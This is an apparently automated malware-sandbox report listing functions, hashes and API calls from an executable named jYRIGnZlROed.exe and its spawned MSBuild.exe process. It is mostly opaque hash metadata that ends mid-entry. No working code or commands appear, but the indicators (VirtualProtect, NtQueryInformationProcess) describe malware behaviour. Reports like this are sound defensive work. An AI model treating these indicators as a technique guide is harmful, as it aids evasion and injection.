Opcode Fuzzy Hash: 85a9d0f2fd44534fff632a5a6bcf629534b209cbb82112c72b1627d5bcff474e
Instruction Fuzzy Hash: 1A915A30E103099FEF68DF74DA44B6EB7B6BF84304F108929E4069B299DB349D45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 065E70A0 Relevance: 9.2, Strings: 7, Instructions: 405COMMON

Download Yara Rule

Strings

$^q, xrefs: 065E73E8
$^q, xrefs: 065E75A8
$^q, xrefs: 065E75B4
$^q, xrefs: 065E73DC
$^q, xrefs: 065E753C
.5vq, xrefs: 065E70FB
$^q, xrefs: 065E7382

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: .5vq$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-390881366
Opcode ID: d8e2051d9fd32eb69ddf8843e888ae6b30f15c5d9b5b72f279d0e93029184241
Instruction ID: c981435f97c2c756fe4162040e69a3f351620deb084d4b7a9a4c4a456c8bb23f
Opcode Fuzzy Hash: d8e2051d9fd32eb69ddf8843e888ae6b30f15c5d9b5b72f279d0e93029184241
Instruction Fuzzy Hash: CEF14C34A10209CFDB59EF68D554B6EB7B3BF88344F208569D4059B399DB31DC86CB90

Uniqueness

Uniqueness Score: -1.00%

Function 065E83F0 Relevance: 5.3, Strings: 4, Instructions: 282COMMON

Download Yara Rule

Strings

$^q, xrefs: 065E86BB
$^q, xrefs: 065E864A
$^q, xrefs: 065E8656
$^q, xrefs: 065E86AF

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: daf787ea71f3b7044507b5fa02edcb32e10ee86aec491e91ad6493423f9fb1db
Instruction ID: f0360a6abd195f6edf3e13a96d2c7849f4d8c2c5c3855b51912f13f786932fec
Opcode Fuzzy Hash: daf787ea71f3b7044507b5fa02edcb32e10ee86aec491e91ad6493423f9fb1db
Instruction Fuzzy Hash: A0B13B30A102098FDB58DB68D984B6EB7B2FF84304F248969D4069B395DB35DC86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 065E8808 Relevance: 5.2, Strings: 4, Instructions: 168COMMON

Download Yara Rule

Strings

$^q, xrefs: 065E8893
LR^q, xrefs: 065E894A
LR^q, xrefs: 065E88FB
$^q, xrefs: 065E8887

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: LR^q$LR^q$$^q$$^q
API String ID: 0-2454687669
Opcode ID: 1c9663026f1e81689623c5d39fe74dfcfdae34740bc035ccf6f261f30f507e44
Instruction ID: b0135f40caa891f47c076b357134d4b83bc78db5305f6d0e375cee88c44267a9
Opcode Fuzzy Hash: 1c9663026f1e81689623c5d39fe74dfcfdae34740bc035ccf6f261f30f507e44
Instruction Fuzzy Hash: F151B134B006059FDF59EB68D940A6AB7E2FF84304F148969E806DB3A9DB31EC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 065EACD8 Relevance: 5.2, Strings: 4, Instructions: 166COMMON

Download Yara Rule

Strings

$^q, xrefs: 065EAE5C
$^q, xrefs: 065EAE8B
$^q, xrefs: 065EAE09
$^q, xrefs: 065EAEB4

Memory Dump Source

Source File: 00000008.00000002.1683267781.00000000065E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 065E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_65e0000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 5159ff65c050c3b4d75475ff64be41234bf4406cc31458c60ab48bfe2421d536
Instruction ID: b5609160fbe124c896890c0ca6fa35491c46f4237a4eeca7ea6af99179c9b5d2
Opcode Fuzzy Hash: 5159ff65c050c3b4d75475ff64be41234bf4406cc31458c60ab48bfe2421d536
Instruction Fuzzy Hash: FC518C38E102059FDF69DB78D980AAEB7B2FB84311F108929E8169B359DB31DC45CF90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: jYRIGnZlROed.exePID: 7360, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	19.5%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	33
Total number of Limit Nodes:	0

Executed Functions

Function 0517B0BC Relevance: 1.6, APIs: 1, Instructions: 103
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtQueryInformationProcess.NTDLL(?,?,?,?,?), ref: 0517B7AD

Memory Dump Source

Source File: 00000009.00000002.1700279496.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5170000_jYRIGnZlROed.jbxd

Similarity

API ID: InformationProcessQuery
String ID:
API String ID: 1778838933-0
Opcode ID: e143d1439bc11fc841f632d489767206a5e63178290a4a90c4513be0882a7d53
Instruction ID: c34abf166b611f37afab0fc73cd2967dca8b1209fa8cc8e22fd8f6376c68f5ad
Opcode Fuzzy Hash: e143d1439bc11fc841f632d489767206a5e63178290a4a90c4513be0882a7d53
Instruction Fuzzy Hash: A04166B9D04258DFCB10DFAAD984A9EFBB5BB09310F20906AE914B7310D335A945CF68

Uniqueness

Uniqueness Score: -1.00%

Function 016084F0 Relevance: 1.6, APIs: 1, Instructions: 97
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0160859F

Memory Dump Source

Source File: 00000009.00000002.1694781832.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1600000_jYRIGnZlROed.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 151feda66d4146f5f9867718f936581d580bfec55a9ed8a3c6704ea78deed4ad
Instruction ID: 01f4fb770e93280f4c3d6fd2345fa5cbd0223c223a60ac1fea9d4c4fff58b0d7
Opcode Fuzzy Hash: 151feda66d4146f5f9867718f936581d580bfec55a9ed8a3c6704ea78deed4ad
Instruction Fuzzy Hash: 1631A9B9D042589FCB14CFA9D880AEEFBF5BB09310F24A02AE814B7250D335A945CF64

Uniqueness

Uniqueness Score: -1.00%

Function 016084F8 Relevance: 1.6, APIs: 1, Instructions: 94
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0160859F

Memory Dump Source

Source File: 00000009.00000002.1694781832.0000000001600000.00000040.00000800.00020000.00000000.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1600000_jYRIGnZlROed.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b443ade795dcbcd302fe81ba9dacb4615998e2dccda82d62b092d8ad4767d1ca
Instruction ID: 057a51f52bf4b8954994019ee60bc4280f7986902507ac1ff323fc3f850ba090
Opcode Fuzzy Hash: b443ade795dcbcd302fe81ba9dacb4615998e2dccda82d62b092d8ad4767d1ca
Instruction Fuzzy Hash: 7F3197B9D002589FCB14CFA9D884ADEFBF5BB19310F24902AE814B7254D375AA45CF68

Uniqueness

Uniqueness Score: -1.00%

Function 0517B134 Relevance: 1.6, APIs: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OutputDebugStringW.KERNELBASE(?), ref: 0517CC12

Memory Dump Source

Source File: 00000009.00000002.1700279496.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5170000_jYRIGnZlROed.jbxd

Similarity

API ID: DebugOutputString
String ID:
API String ID: 1166629820-0
Opcode ID: 269a5c0ab28aefdb932505858fb106cae7a1e2f122272ccc82966c19d5ef7329
Instruction ID: 711df8398a49cae7653b2db5e3f6b321de276ded0c32f3958c5503c01dcc529b
Opcode Fuzzy Hash: 269a5c0ab28aefdb932505858fb106cae7a1e2f122272ccc82966c19d5ef7329
Instruction Fuzzy Hash: 9C31BAB4D0424C9FCB14CFAAD584ADEFBF5AB49314F14806AE818B7320D734A945CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0517B14C Relevance: 1.6, APIs: 1, Instructions: 73
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0517CCEE

Memory Dump Source

Source File: 00000009.00000002.1700279496.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_5170000_jYRIGnZlROed.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: ae847812ecfd2c644d8cab7050f943349a53ffab55c4864180222fe0ffa97a41
Instruction ID: a5a42e70231d88262e55f3ff267d34f90017043ea213d47d7f2163dda7a4d59d
Opcode Fuzzy Hash: ae847812ecfd2c644d8cab7050f943349a53ffab55c4864180222fe0ffa97a41
Instruction Fuzzy Hash: 3A31CEB9D04258DFCB10CFA9D584AEEFBF4AB09324F14906AE815B7310D334A944CFA8

Uniqueness

Uniqueness Score: -1.00%

Function 0131D06C Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1693541890.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_131d000_jYRIGnZlROed.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b71674727894f7d96fac160bd7d6cc879903e6a3d7476556a5ad66219ce1b92
Instruction ID: e6bd75a96849196df4f3bbd21745e97d63ff51a611ae7cdbbc542706cbf83a8f
Opcode Fuzzy Hash: 1b71674727894f7d96fac160bd7d6cc879903e6a3d7476556a5ad66219ce1b92
Instruction Fuzzy Hash: 00212871504244DFDB09DF94D9C8B17BFA5FB89318F24C269ED090B25AC33AD456CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0132D2F0 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1693638759.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_132d000_jYRIGnZlROed.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7e8cdb6b580e7c1b8ffd4848d3aacb1a22b4cd37a3ef85b2fea19ab74882d4a4
Instruction ID: 2d4bca506d6c10f509fa72c0bf036c2d87bffd7ded26d3fc09015cb9fca0d880
Opcode Fuzzy Hash: 7e8cdb6b580e7c1b8ffd4848d3aacb1a22b4cd37a3ef85b2fea19ab74882d4a4
Instruction Fuzzy Hash: 902126B1604204DFDB05EF98D9C0B26BFA5FB84318F20C56DDA4A4B356C33AD446CA61

Uniqueness

Uniqueness Score: -1.00%

Function 0132D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1693638759.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_132d000_jYRIGnZlROed.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb705cdcbb79cf56d3bc0b69dc8e8ed67df754192563a5875275943f8e530a8d
Instruction ID: a64b03eea1e92e92ce01722ed0e8a4d8cf048fa3cda8daff90893fb34399b75d
Opcode Fuzzy Hash: bb705cdcbb79cf56d3bc0b69dc8e8ed67df754192563a5875275943f8e530a8d
Instruction Fuzzy Hash: 11213471604244DFCB15EF58D9C4B26BFA5FB84318F20C56DD90A4B3A6C33AD447CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 0132D006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1693638759.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_132d000_jYRIGnZlROed.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c120fd9e637aa4fb1dbfa551a092fd91d15b0dbeb9a2d237d232fbc8eedff0f
Instruction ID: eab9e6af0b08da1304d235bc731fe1c2a6d2039b2a3786e85e0a82558932054b
Opcode Fuzzy Hash: 4c120fd9e637aa4fb1dbfa551a092fd91d15b0dbeb9a2d237d232fbc8eedff0f
Instruction Fuzzy Hash: 4B2180755083809FCB03DF64D994711BF71EB46218F28C5DAD8498F2A7C33A981ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0131D067 Relevance: .1, Instructions: 58COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1693541890.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_131d000_jYRIGnZlROed.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction ID: ba8e5a391c5e7bbb8a0092afaa689b8fa973957b8bb94f1ab8d0a631d5b26575
Opcode Fuzzy Hash: c7c8d58dc0dea2b6e01ffeb94055e7b182a7219ccea2c20f3472bf21e95a7b9d
Instruction Fuzzy Hash: B821DF76404280DFDB0ACF54D9C4B16BF72FB89318F24C2A9DD480B25AC33AD426CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0132D2EB Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1693638759.000000000132D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0132D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_132d000_jYRIGnZlROed.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: e395415657cdcff34176ddb32288aabc2022c6a31c98c64ebd8841f17e09795c
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 4C11DD75504280CFDB02DF58D5C4B15FFB1FB84318F24C6AAD9494B256C33AD40ACB61

Uniqueness

Uniqueness Score: -1.00%

Function 0131D92D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1693541890.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_131d000_jYRIGnZlROed.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4216ac8685c5f422c6f693d02da0113295ca762e82deca2a4669a37038844a0f
Instruction ID: 604d04e7b5afdb5e0183d45440cddce384e40e01f3bbe5dc0aeb1004e1dc1ee9
Opcode Fuzzy Hash: 4216ac8685c5f422c6f693d02da0113295ca762e82deca2a4669a37038844a0f
Instruction Fuzzy Hash: 8B01A7711083449AE7194E6AC988767BF9EEF42728F18C56AED494A18AC2799840CA71

Uniqueness

Uniqueness Score: -1.00%

Function 0131D92C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.1693541890.000000000131D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0131D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_131d000_jYRIGnZlROed.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 355d6b278f700b9607bd402588e7386069bb963c281a3cda5146b2d6c0d65ef6
Instruction ID: b492e81bd23c25393d47229950014a2fdfe46e40ac2d12634fa72b942800270d
Opcode Fuzzy Hash: 355d6b278f700b9607bd402588e7386069bb963c281a3cda5146b2d6c0d65ef6
Instruction Fuzzy Hash: CFF062714043449AE7158A1AD8C8B66FFA9EB41628F18C55AED494E28AC2799844CAB1

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: MSBuild.exePID: 7644, Parent PID: 7360COMMON

Execution Graph

Execution Coverage:	11.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	50
Total number of Limit Nodes:	6

Executed Functions

Function 06723058 Relevance: 8.1, Strings: 6, Instructions: 553
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0672378F
$^q, xrefs: 0672376B
$^q, xrefs: 06723742
$^q, xrefs: 0672374E
$^q, xrefs: 06723777
$^q, xrefs: 0672379B

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 4789d763bb5186dc1e4a97740c157f983f5c549c785abbf3ac64b54580a6f102
Instruction ID: cc1278218f7bce0f2c090c6fc8bed2cd1ecc04117b7cc3bda443f1b293a64ecf
Opcode Fuzzy Hash: 4789d763bb5186dc1e4a97740c157f983f5c549c785abbf3ac64b54580a6f102
Instruction Fuzzy Hash: 9C323231E1061A8FCB54DF79C8945ADB7B6BFC9310F108669D409AB224EF34ED86CB81

Uniqueness

Uniqueness Score: -1.00%

Function 06727D98 Relevance: 3.0, Strings: 2, Instructions: 476
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 06728107
$^q, xrefs: 067280FB

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: dfcabc74951bbaf4c0d02e1c6ef11800b0304ddf6aeee64087bd6db250f36400
Instruction ID: ac370410c6472d5cbec382448f89e70cd5143a40886a522e98ba5e15844cb8bc
Opcode Fuzzy Hash: dfcabc74951bbaf4c0d02e1c6ef11800b0304ddf6aeee64087bd6db250f36400
Instruction Fuzzy Hash: 2002A030B1022A9FDB54DB75D990AAEB7E2FF84304F148529D4059B395DB32EC86CB92

Uniqueness

Uniqueness Score: -1.00%

Function 06722340 Relevance: 1.0, Instructions: 1002COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8c0050fdf21919519382b8bb9ff2141816a1a4d99ccb8c5965c28a765b12b28
Instruction ID: 12c38e47e0984dc6945ed2b4508306389e9a79010bb252a435c091b179f3e1fb
Opcode Fuzzy Hash: c8c0050fdf21919519382b8bb9ff2141816a1a4d99ccb8c5965c28a765b12b28
Instruction Fuzzy Hash: 9E926634E002258FDB64DF68C188A6DB7F2FB44314F5484A9D859AB366DB34EE85CF90

Uniqueness

Uniqueness Score: -1.00%

Function 067265F0 Relevance: .8, Instructions: 814COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d8cbcc09cffc44dcd893016ba1d2ae999fba3726e286942ff8bf8afd8ce023e1
Instruction ID: b923a93105d5922062097057b38695f68080da3997d032e4359043576c5ab706
Opcode Fuzzy Hash: d8cbcc09cffc44dcd893016ba1d2ae999fba3726e286942ff8bf8afd8ce023e1
Instruction Fuzzy Hash: 1F62CF34B102269FDB54DB68D584AADB7F2FF84314F24856AE406EB394DB31EC46CB90

Uniqueness

Uniqueness Score: -1.00%

Function 067255A8 Relevance: .6, Instructions: 607COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c57ccaa02767f9d2540e3ca93db1d2334da56863338aac8bfba91354897c1769
Instruction ID: 127a2278a7688f7f18681a975268544ee2cd65c94007832df4db3920c948a184
Opcode Fuzzy Hash: c57ccaa02767f9d2540e3ca93db1d2334da56863338aac8bfba91354897c1769
Instruction Fuzzy Hash: B122D035E102268FEB64DBA4C4846BEBBB2FF85314F248569D419EB384DB31DD42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0672B240 Relevance: .6, Instructions: 582COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1ecc4a98639454d9f7b29988784a5853483d9593531bdce3c854d0964342e86
Instruction ID: f31795d69a09dc9cbc129d44fd30837296bd4eed44b8dcc18cda19b462dcef99
Opcode Fuzzy Hash: e1ecc4a98639454d9f7b29988784a5853483d9593531bdce3c854d0964342e86
Instruction Fuzzy Hash: 5E229170E1022A8FDF64CB68C4807BDB7B6FB89718F248926D449DB395DB35DC818B91

Uniqueness

Uniqueness Score: -1.00%

Function 0672ACE8 Relevance: 10.4, Strings: 8, Instructions: 395
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0672AE09
$^q, xrefs: 0672AE15
$^q, xrefs: 0672AEC0
$^q, xrefs: 0672AEB4
$^q, xrefs: 0672AE97
$^q, xrefs: 0672AE68
$^q, xrefs: 0672AE5C
$^q, xrefs: 0672AE8B

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 4f9de832e0085b89d0b6e8858cb0a6cf6deeb34429c23226cc773436f037e16c
Instruction ID: 81f788c491ff531d79584b63bf587cde76e5063ff6fc3ded26e570930c4d65a8
Opcode Fuzzy Hash: 4f9de832e0085b89d0b6e8858cb0a6cf6deeb34429c23226cc773436f037e16c
Instruction Fuzzy Hash: 01E17F70E1031A8FCB69DF69D9806AEB7B2FF85304F208929D405AB359DB35DC46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0672B668 Relevance: 8.0, Strings: 6, Instructions: 472
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0672BC25
$^q, xrefs: 0672BBF1
$^q, xrefs: 0672BBB1
$^q, xrefs: 0672BC19
$^q, xrefs: 0672BBBD
$^q, xrefs: 0672BBE5

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 94d690d88f5d0636fa7b8cf0e7d93516b9a9bdb2df7187fa1c9780f6477bf299
Instruction ID: fc3c97062151b002e9918c89fa1a1f54987199456014b86ed1dcb027c08acd06
Opcode Fuzzy Hash: 94d690d88f5d0636fa7b8cf0e7d93516b9a9bdb2df7187fa1c9780f6477bf299
Instruction Fuzzy Hash: DE028030E1022A8FDF64CF68D5806ADB7B2FB84B18F14892AD449DB355DB31ED85CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06729168 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 067291F6
$^q, xrefs: 067291BB
$^q, xrefs: 067291EA
$^q, xrefs: 067291AF

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: abb68b828af5ec89390429a63d4bf154afa40a9acbe56b599e93ab653b2b7e44
Instruction ID: b94f7abf21c26969014a26219a9ab928d356bf246780b9bd753e93b6bac0b036
Opcode Fuzzy Hash: abb68b828af5ec89390429a63d4bf154afa40a9acbe56b599e93ab653b2b7e44
Instruction Fuzzy Hash: 1C913F30F1022A9FDB54DB66D9507AEB7F6BFC9204F148569C509EB384EB309C868B91

Uniqueness

Uniqueness Score: -1.00%

Function 0672CF50 Relevance: 4.6, Strings: 3, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 0672D347
$^q, xrefs: 0672D35B
$^q, xrefs: 0672D34F

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 39a54bb8a853734c181d5a878660132e90f91c139126c0943b4a14aeb7cb1b42
Instruction ID: cfa13d849858ee9eee31b16d77b11b33f8b98603c4cdd07b989a6aac27f1dd3c
Opcode Fuzzy Hash: 39a54bb8a853734c181d5a878660132e90f91c139126c0943b4a14aeb7cb1b42
Instruction Fuzzy Hash: 30627330A002168FCB55EF69D590A5EB7F2FF84344F208A29D0159F369DB71ED8ACB91

Uniqueness

Uniqueness Score: -1.00%

Function 06724B78 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06724BA3
XPcq, xrefs: 06724CC9
\Ocq, xrefs: 06724D53

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 5252fc1534c07991dcb1ad9af0c97821bfa79293b216fdf33c04305d764e11a3
Instruction ID: a1c4ec90015962f6dcbe85a946ad6ae69dab8e263a0ecdcafa39b4f3630ce16c
Opcode Fuzzy Hash: 5252fc1534c07991dcb1ad9af0c97821bfa79293b216fdf33c04305d764e11a3
Instruction Fuzzy Hash: 55617F70F102199FEB549FA9C8547AEBBF7FB88300F208429D50AEB395DB758C458B91

Uniqueness

Uniqueness Score: -1.00%

Function 06729159 Relevance: 2.7, Strings: 2, Instructions: 161
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 067291EA
$^q, xrefs: 067291AF

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 6ed5390508de74f62bd89455d1dc1805dc11c182afc6371fc1b2c231b58b8c0a
Instruction ID: fd1dfded5472f7404f01596a434501e4576341d6af3766b8be0a99e7b43d8a31
Opcode Fuzzy Hash: 6ed5390508de74f62bd89455d1dc1805dc11c182afc6371fc1b2c231b58b8c0a
Instruction Fuzzy Hash: AC515130B1021A9FDB54DB76D8A0BAEB7F6ABC8644F148579C509DB384EA30DC43CB91

Uniqueness

Uniqueness Score: -1.00%

Function 06724B68 Relevance: 2.6, Strings: 2, Instructions: 143
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

fcq, xrefs: 06724BA3
XPcq, xrefs: 06724CC9

Memory Dump Source

Source File: 0000000D.00000002.4084689951.0000000006720000.00000040.00000800.00020000.00000000.sdmp, Offset: 06720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_6720000_MSBuild.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 5177a4996fe16286908da4ad58565d660eed12f6c51c296df54eb0d26cd46bbd
Instruction ID: bb4b1bdea3b67ecaf70c92b3a5035a2e4c8e0971b482ffc32d7683611f5b3545
Opcode Fuzzy Hash: 5177a4996fe16286908da4ad58565d660eed12f6c51c296df54eb0d26cd46bbd
